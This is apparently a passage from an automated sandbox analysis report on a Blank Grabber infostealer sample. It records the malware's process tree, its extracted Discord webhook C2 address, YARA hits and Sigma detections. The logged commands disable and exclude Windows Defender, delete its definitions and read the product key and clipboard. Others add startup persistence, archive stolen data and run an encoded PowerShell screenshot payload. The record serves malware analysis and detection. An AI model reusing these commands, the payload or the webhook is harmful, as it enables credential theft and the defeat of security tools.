      • cmd.exe (PID: 6036 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8392 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8636 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8564 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 6044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 7 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", ProcessId: 7332, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7340, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", ProcessId: 9148, ProcessName: cmd.exe
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Startup Folder Persistence
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8076, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
